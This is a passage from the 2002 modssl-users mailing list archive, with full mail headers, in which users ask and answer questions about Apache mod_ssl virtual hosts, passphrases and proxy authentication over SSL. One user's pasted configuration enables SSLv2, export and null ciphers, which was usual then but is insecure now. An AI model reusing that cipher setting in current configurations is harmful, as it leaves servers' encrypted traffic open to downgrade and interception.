213.237.13.224.adsl.hc.worldonline.dk (HELO NEIGAARD?MOB) (213.237.13.224) by fe000.worldonline.dk with SMTP; 14 Feb 2002 20:44:59 -0000 Date: Thu, 14 Feb 2002 21:43:56 +0100 From: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-Mailer: The Bat! (v1.53d) X-Priority: 3 (Normal) Message-ID: <913019471.20020214214356@e-box.dk> To: modssl-users@modssl.org Subject: Newbie - The big picture MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I'm totally new to mod_ssl, so I downloaded the docs, and started reading them. But the reference raised a lot of questions for me, so here they come. I'm sorry for the multi-post, but I don't belive my questions are large enough for separate posts, and I have so many :) SSLPassPhraseDialog: Is this only needed for certificates? If I set this to builtin, what then? When I start Apache, do I then get prompted for each VirtualHost? SSLMutex: Does SSLMutex work under FreeBSD? SSLEngine: If I want to SSL enable a VirtualHost, should I then use this switch? SSLRequireSSL: Strange switch, if I want to be sure SSL is used, or? Maybe someone could give me a example of a httpd.conf where one VirtualHost requires SSL, and another doesn't :) And what if I in one VirtualHost want to SSL enable some pages, but not all? -- Med venlig hilsen/Best regards, Søren Neigaard mailto:neigaard@e-box.dk -- "When a place gets crowded enough to require ID's, social collapse is not far away. It is time to go elsewhere. The best thing about space travel is that it made it possible to go elsewhere." ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 14 21:49:28 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA21563; Thu, 14 Feb 2002 21:48:42 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from www.webdms.com id VAA21453; Thu, 14 Feb 2002 21:47:24 +0100 (MET) Received: from jdp2 (firewall.webdms.com [199.184.207.3]) by www.webdms.com (8.8.5/SCO5) with SMTP id NAA06417 for ; Thu, 14 Feb 2002 13:53:51 -0700 (MST) Message-ID: <006b01c1b59a$0aa8a4e0$0fa8a8c0@jdp2.webdms.com> From: "Joe Pearson" To: Subject: Name Based HTTP vhosts and IP Based HTTPS vhosts Date: Thu, 14 Feb 2002 13:56:14 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Joe Pearson" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I'm trying to setup to ssl virtual hosts. When I start up the server, only the last one in the configuration file gets recognized. Does anyone have any clue what I'm doing wrong? NameVirtualHost 199.184.207.29 DocumentRoot /home/httpd/homecu ServerName www.domain.net ServerAlias *.domain.net domain.net ServerName www.domain.net DocumentRoot "/home/httpd/homecu" ErrorLog logs/error_log TransferLog logs/access_log SSLEngine on SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SSLCertificateFile /etc/httpd/conf/ssl.crt/www.crt SSLCertificateKeyFile /etc/httpd/conf/ssl.key/www.key SetEnvIf User-Agent ".*MSIE.*" \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 CustomLog "|/usr/sbin/rotatelogs /etc/httpd/logs/access_ssl 86400" elf ServerName www2.domain.net DocumentRoot "/home/httpd/homecu" ErrorLog logs/error_log TransferLog logs/access_log SSLEngine on SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SSLCertificateFile /etc/httpd/conf/ssl.crt/www2.crt SSLCertificateKeyFile /etc/httpd/conf/ssl.key/www2.key SSLOptions +StdEnvVars SetEnvIf User-Agent ".*MSIE.*" \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 CustomLog "|/usr/sbin/rotatelogs /etc/httpd/logs/access_ssl 86400" elf -- Joe Pearson Database Management Services, Inc. 208-384-1311 ext. 11 http://www.webdms.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 14 22:04:35 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA23241; Thu, 14 Feb 2002 22:03:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from shipyard.proteome.com id WAA22995; Thu, 14 Feb 2002 22:00:28 +0100 (MET) Received: from proteus.proteome.com (mailhost.proteome.com [209.192.182.162]) by shipyard.proteome.com (8.10.1/8.10.1) with ESMTP id g1EL6CA09318 for ; Thu, 14 Feb 2002 16:06:12 -0500 (EST) Received: from whaler.proteome.com (whaler.proteome.com [10.203.1.71]) by proteus.proteome.com (8.10.1/8.10.1) with ESMTP id g1EL0PY21807 for ; Thu, 14 Feb 2002 16:00:25 -0500 (EST) Received: (from kylet@localhost) by whaler.proteome.com (8.10.1/8.10.1) id g1EL0PZ26063 for modssl-users@modssl.org; Thu, 14 Feb 2002 16:00:25 -0500 (EST) From: "Kyle Tucker" Message-Id: <1020214160025.ZM26061@whaler> Date: Thu, 14 Feb 2002 16:00:25 -0500 In-Reply-To: NickM "Re: Can Apache proxy authentication be done via SSL?" (Feb 14, 9:22pm) References: <1020214095550.ZM25370@whaler> <1013718140.3c6c1c7cb61c0@webmail.regiocom.net> X-Mailer: Z-Mail (5.0.0 30July97) To: modssl-users@modssl.org Subject: Re: Can Apache proxy authentication be done via SSL? MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kyle Tucker" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Feb 14, 9:22pm, NickM wrote: > Subject: Re: Can Apache proxy authentication be done via SSL? > Im not skilled in this at all, but thought I throw a few thoughts down. > > OK, if I understand you. You have a standard server and have set a proxy dir > to an secure server. well I dont expect that to work as the browser will still > be talking http to the proxy which simply passes it on. > > I think what would be better is one of two things. Have the password entry > page on the secure server and then redirect back on authenticated. Or, in the > way hotmail does it, have some javascript to post the details to the secure > server and then again redirect back to normal (either to re-enter or to entry > pages). > > It doesnt matter if the port is 443 that the proxy is on if its not speaking > ssl, youd need that server to have an ssl version of the server and then > redirect any non secure requests to the https alternative and then proxy from > there. But I still dont see why the proxy in the first place, why not directly > access it seeing as its only for the password authentication. The purpose of this proxy is so many remote users can access web-based online scientific journals to which subscription is based on the source IP address. I need them to gain access to the proxy and protect the password via SSL, then the rest of the access can be via non-SSL proxy. I will try to consume your suggestions of using two servers, but I don't see how that can make the browser send authentication via SSL, althought I do it often for directly-accessed non-proxy Apache/mod_ssl servers. I assume proxy auth (407) works different than normal (401) auth. Thanks for the input. > Quoting Kyle Tucker : > > > Hi, > > I am trying to set up Apache as a proxy server and have > > people authenticate (407 Proxy-Authenticate) via SSL and basic auth > > so the passwords are not sent clear text. The SSL works fine directly > > as a web server and mod_proxy works for normal HTTP traffic, but I > > can't seem to get authentication to work via SSL. I am trying a bunch > > of combinations, even setting the browser (Netscape 4.72) proxy port > > to 443, but for the most part all I get is failures with "Hint: > > speaking > > HTTP to HTTPS port!" in the logs. So before I continue to work on > > this, > > I just want to know is if it's even possible to make this work via > > SSL? > > If so,any hints greatly appreciated. This is Apache 1.3.23, > > mod_ssl-2.8.6-1.3.23 and openssl-0.9.6c on Solaris 8. Thanks. -- - Kyle ---------------------------------------------------------------------- Kyle Tucker - Manager of IT Tel: (978) 816-0229 Incyte Genomics - Proteome Division Fax: (978) 922-3971 100 Cummings Center, Suite 420B Email - kylet@incyte.com Beverly, MA 01915 Web - http://www.incyte.com ---------------------------------------------------------------------- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 14 22:46:22 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA27093; Thu, 14 Feb 2002 22:45:39 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id WAA27008; Thu, 14 Feb 2002 22:44:43 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 237C2BD2B; Thu, 14 Feb 2002 22:17:58 +0100 (CET) Date: Thu, 14 Feb 2002 22:17:58 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Newbie - The big picture Message-ID: <20020214211758.GF17796@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <913019471.20020214214356@e-box.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit In-Reply-To: <913019471.20020214214356@e-box.dk> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, Feb 14, 2002 at 09:43:56PM +0100, Søren Neigaard wrote: > I'm totally new to mod_ssl, so I downloaded the docs, and started > reading them. But the reference raised a lot of questions for me, so > here they come. I'm sorry for the multi-post, but I don't belive my > questions are large enough for separate posts, and I have so many :) > > SSLPassPhraseDialog: > > Is this only needed for certificates? Well, actually they are for the encrypted keys. > > If I set this to builtin, what then? When I start Apache, do I then > get prompted for each VirtualHost? > Once pr. encrypted key with a different password. > > SSLMutex: > > Does SSLMutex work under FreeBSD? > Quoting from the reference: "This is the portable and (under Unix) always provided Mutex variant". Even the sem version is supported on FreeLSD if you compile with MM support. Last time I installed mod_ssl from ports it had MM support. > > SSLEngine: > > If I want to SSL enable a VirtualHost, should I then use this switch? > Yes. > > SSLRequireSSL: > > Strange switch, if I want to be sure SSL is used, or? > Exactly as the Reference says - but it shouldn't really be necessary unless you're messing around with a mixed config. > > Maybe someone could give me a example of a httpd.conf where one > VirtualHost requires SSL, and another doesn't :) > Such a file gets installed as httpd.conf. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 15 04:42:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id EAA26892; Fri, 15 Feb 2002 04:41:58 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns.magvtb.ru id EAA26775; Fri, 15 Feb 2002 04:40:32 +0100 (MET) Received: from 217.107.55.130 (sierra.magvtb.ru [217.107.55.130]) (authenticated) by ns.magvtb.ru (8.11.3/8.11.3) with ESMTP id g1F3fQM66707 for ; Fri, 15 Feb 2002 14:41:28 +1100 (MAGT) Date: Fri, 15 Feb 2002 14:36:28 +1100 From: "Andrew V. Sirotkin" X-Mailer: The Bat! (v1.47 Halloween Edition) Personal X-Priority: 3 (Normal) Message-ID: <45107622533.20020215143628@magadan.ru> To: modssl-users@modssl.org Subject: cgi-bin scripts & SSL Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Andrew V. Sirotkin" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, All! I attempt to use cgi-bin script with SSL as https://host.domain.net/cgi-bin/script For the begining I got a certificate dialog to brouser (MSIE), then script create a page, but I don't see a "secure lock" in the status bar. How can I know SSL is working? Andrew V. Sirotkin mailto:avs@magadan.ru 7(41322)97498 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 15 08:06:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id IAA17867; Fri, 15 Feb 2002 08:05:46 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spong.regiocom.net id IAA17718; Fri, 15 Feb 2002 08:04:15 +0100 (MET) Received: from web by spong.regiocom.net with local (Exim 3.13 #1) id 16bcPh-0003vw-00 for modssl-users@modssl.org; Fri, 15 Feb 2002 08:04:09 +0100 To: modssl-users@modssl.org Subject: Re: Can Apache proxy authentication be done via SSL? Message-ID: <1013756649.3c6cb2e92654d@webmail.regiocom.net> Date: Fri, 15 Feb 2002 08:04:09 +0100 (CET) From: NickM References: <1020214095550.ZM25370@whaler> <1013718140.3c6c1c7cb61c0@webmail.regiocom.net> <1020214160025.ZM26061@whaler> In-Reply-To: <1020214160025.ZM26061@whaler> MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 8bit User-Agent: IMP/PHP IMAP webmail program 2.2.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: NickM X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Quoting Kyle Tucker : > The purpose of this proxy is so many remote users can access > web-based online scientific journals to which subscription is > based on the source IP address. I need them to gain access to > the proxy and protect the password via SSL, then the rest of > the access can be via non-SSL proxy. I will try to consume your > suggestions of using two servers, but I don't see how that can > make the browser send authentication via SSL, althought I do > it often for directly-accessed non-proxy Apache/mod_ssl servers. > I assume proxy auth (407) works different than normal (401) auth. > Thanks for the input. well in normal circumstances Id use a script to check against a database before allowing access etc. well to draw as I was describing: now you have Proxy S1 -----------> R1(secure) which I cant see working. Im saying as an alternative for proxying try Proxy S1--->S1(secure)--------------> R1(secure) R1 being the offsite/other server you are proxying, S1 being your server, now having a secure option also. Of course the problem here will be certificates, it will want the certificate from S1 and not care about S2 I believe (I question the security sense of this). what might be better is simply having: S1 ------------> R1(S) with password page | | Redirect | S1 (valid) or S1 password page, POST set to R1 | R1 validate and redirect -------- S1 (entry or password page) But like I said, for simply checking the IP youd be better scripting it I think. Not sure its helping you here but some simple ideas that might give you some. Nick ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 15 09:21:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA25511; Fri, 15 Feb 2002 09:19:56 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id JAA25368; Fri, 15 Feb 2002 09:18:30 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id JAA12854 for ; Fri, 15 Feb 2002 09:18:24 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma012824; Fri, 15 Feb 02 09:18:21 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id JAA22093 for ; Fri, 15 Feb 2002 09:18:20 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA03613 for ; Fri, 15 Feb 2002 09:18:19 +0100 (MET) Message-ID: <3C6CC44B.6444FAAB@bourse.ch> Date: Fri, 15 Feb 2002 09:18:19 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Name Based HTTP vhosts and IP Based HTTPS vhosts References: <006b01c1b59a$0aa8a4e0$0fa8a8c0@jdp2.webdms.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Joe Pearson wrote: > > I'm trying to setup to ssl virtual hosts. When I start up the server, only > the last one in the configuration file gets recognized. Does anyone have > any clue what I'm doing wrong? Attempting the impossible... You can't use name-based VHs with SSL. See http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47 http://marc.theaimsgroup.com/?l=apache-modssl&m=98559369910170&w=2 Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 15 13:01:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA19631; Fri, 15 Feb 2002 13:00:36 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id MAA19505; Fri, 15 Feb 2002 12:59:43 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 84C684CE715; Fri, 15 Feb 2002 12:59:42 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1FBQJU23580; Fri, 15 Feb 2002 12:26:19 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mclean.mail.mindspring.net id KAA01773; Fri, 15 Feb 2002 10:09:14 +0100 (MET) From: rwidmer@developersdesk.com Received: from 11cust133.tnt1.twin-falls.id.da.uu.net ([67.234.149.133] helo=mail.mindspring.com) by mclean.mail.mindspring.net with smtp (Exim 3.33 #1) id 16beMc-00050Y-00 for modssl-users@modssl.org; Fri, 15 Feb 2002 04:09:07 -0500 To: modssl-users@modssl.org X-Mailer: Post Road Mailer for OS/2 (Green Edition Ver 3.0) Date: Fri, 15 Feb 2002 02:23:19 Subject: Re: Can Apache proxy authentication be done via SSL? Message-Id: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: rwidmer@developersdesk.com X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users ** Reply to note from NickM Fri, 15 Feb 2002 08:04:09 +0100 (CET) > > Quoting Kyle Tucker : > > > > But like I said, for simply checking the IP youd be better scripting > it I think. Not sure its helping you here but some simple ideas that > might give you some. One thing to remember, IP addresses only count if you assign them to a client, or know they won't chage on you. DSL addresses _sometimes_ change. Dial-up users usually get a new one every time they call. Proxies can show many hosts coming from one address, and the killer is AOL where I've seen a page reqiest and the images that go with the page come from different addresses in one page hit. Rick Rick Widmer Internet Marketing Specialists http://www.developersdesk.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 15 14:52:49 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA01906; Fri, 15 Feb 2002 14:51:58 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail3.cableone.net id OAA01775; Fri, 15 Feb 2002 14:50:39 +0100 (MET) Received: from b2v2l7 ([24.116.137.140]) by mail3.cableone.net with Microsoft SMTPSVC(5.5.1877.687.68); Fri, 15 Feb 2002 06:45:02 -0700 Message-ID: <000a01c1b626$2eb04140$8c897418@b2v2l7> From: "Joe Pearson" To: References: <006b01c1b59a$0aa8a4e0$0fa8a8c0@jdp2.webdms.com> <3C6CC44B.6444FAAB@bourse.ch> Subject: Re: Name Based HTTP vhosts and IP Based HTTPS vhosts Date: Fri, 15 Feb 2002 06:39:24 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Joe Pearson" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users ----- Original Message ----- From: "Owen Boyle" To: Sent: Friday, February 15, 2002 1:18 AM Subject: Re: Name Based HTTP vhosts and IP Based HTTPS vhosts > Joe Pearson wrote: > > > > I'm trying to setup to ssl virtual hosts. When I start up the server, only > > the last one in the configuration file gets recognized. Does anyone have > > any clue what I'm doing wrong? > > Attempting the impossible... You can't use name-based VHs with SSL. See > > http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47 > http://marc.theaimsgroup.com/?l=apache-modssl&m=98559369910170&w=2 > > Rgds, > > Owen Boyle. > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 15 14:53:35 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA01986; Fri, 15 Feb 2002 14:52:44 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail3.cableone.net id OAA01784; Fri, 15 Feb 2002 14:50:45 +0100 (MET) Received: from b2v2l7 ([24.116.137.140]) by mail3.cableone.net with Microsoft SMTPSVC(5.5.1877.687.68); Fri, 15 Feb 2002 06:45:08 -0700 Message-ID: <000b01c1b626$32962e00$8c897418@b2v2l7> From: "Joe Pearson" To: References: <006b01c1b59a$0aa8a4e0$0fa8a8c0@jdp2.webdms.com> <3C6CC44B.6444FAAB@bourse.ch> Subject: Re: Name Based HTTP vhosts and IP Based HTTPS vhosts Date: Fri, 15 Feb 2002 06:39:31 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Joe Pearson" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users But I am trying to use IP based vitual hosts. Are you saying I can't mix IP based https with name based http? ----- Original Message ----- From: "Owen Boyle" To: Sent: Friday, February 15, 2002 1:18 AM Subject: Re: Name Based HTTP vhosts and IP Based HTTPS vhosts > Joe Pearson wrote: > > > > I'm trying to setup to ssl virtual hosts. When I start up the server, only > > the last one in the configuration file gets recognized. Does anyone have > > any clue what I'm doing wrong? > > Attempting the impossible... You can't use name-based VHs with SSL. See > > http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47 > http://marc.theaimsgroup.com/?l=apache-modssl&m=98559369910170&w=2 > > Rgds, > > Owen Boyle. > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 15 17:11:21 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA15790; Fri, 15 Feb 2002 17:11:01 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id RAA15705; Fri, 15 Feb 2002 17:10:05 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id RAA00221 for ; Fri, 15 Feb 2002 17:09:55 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma000207; Fri, 15 Feb 02 17:09:53 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id RAA25861 for ; Fri, 15 Feb 2002 17:09:52 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id RAA12417 for ; Fri, 15 Feb 2002 17:09:50 +0100 (MET) Message-ID: <3C6D32CE.7599435A@bourse.ch> Date: Fri, 15 Feb 2002 17:09:50 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Name Based HTTP vhosts and IP Based HTTPS vhosts References: <006b01c1b59a$0aa8a4e0$0fa8a8c0@jdp2.webdms.com> <3C6CC44B.6444FAAB@bourse.ch> <000b01c1b626$32962e00$8c897418@b2v2l7> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Joe Pearson wrote: > > But I am trying to use IP based vitual hosts. Are you saying I can't mix IP > based https with name based http? whoops - my mistake, I just looked at your config again and you're *not* trying to NBVH on 443... Of course you can mix, IP, name-based and port-based VHs and your config looks OK - except for one detail: www.domain.net and www2.domain.net both have the same DocumentRoot so would look the same in the browser... Apart from that, I didn't see any "Listen" Directives - you may have them elsewhere, but I usually keep them next to the VH containers for clarity. You would need: Listen 199.184.207.29:80 Listen 199.184.207.29:443 Listen 199.184.207.28:443 NB - 443 isn't listened to by default) Also, since all your VHs are distinguished by IP or port, you don't need the > NameVirtualHost 199.184.207.29 Rgds, owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 15 17:58:33 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA21288; Fri, 15 Feb 2002 17:57:45 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from work.fantomas.sk id RAA21143; Fri, 15 Feb 2002 17:56:20 +0100 (MET) Received: (from uhlar@localhost) by work.fantomas.sk (8.9.3/8.9.3/Debian 8.9.3-21) id RAA25189 for modssl-users@modssl.org; Fri, 15 Feb 2002 17:56:19 +0100 Date: Fri, 15 Feb 2002 17:56:19 +0100 From: "Matus \"fantomas\" Uhlar" To: modssl-users@modssl.org Subject: the same virtualhost with http and https? Message-ID: <20020215175619.A25159@fantomas.sk> Mail-Followup-To: modssl-users@modssl.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i X-Echelon: nuclear bomb plane crash terrorist attack djihad spy echelon sucks Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Matus \"fantomas\" Uhlar" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, I'd like to know, how does modssl decide which port is ssl and which one is non-ssl? if I bind apache to two ports, how to tell which one should be used for ssl connects and which one for non-ssl connects? Another question. if I run http on port 80 and httpd on port 443, and I define only one virtualhost: ServerName blablabla will that virtualhost be available via both ports/protocols? Or, do I need to define two virtualhosts, one on port 80 without ssl and one on 443 with ssl? -- Matus "fantomas" Uhlar, uhlar@fantomas.sk ; http://www.fantomas.sk/ Warning: I don't wish to receive spam to this address. Varovanie: Nezelam si na tuto adresu dostavat akukolvek reklamnu postu. Depression is merely anger without enthusiasm. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 15 18:50:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA28341; Fri, 15 Feb 2002 18:49:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id SAA28315; Fri, 15 Feb 2002 18:48:52 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id SAA07853 for ; Fri, 15 Feb 2002 18:48:45 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma007845; Fri, 15 Feb 02 18:48:42 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id SAA21542 for ; Fri, 15 Feb 2002 18:48:41 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id SAA20775 for ; Fri, 15 Feb 2002 18:48:40 +0100 (MET) Message-ID: <3C6D49F8.BD0400ED@bourse.ch> Date: Fri, 15 Feb 2002 18:48:40 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: the same virtualhost with http and https? References: <20020215175619.A25159@fantomas.sk> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 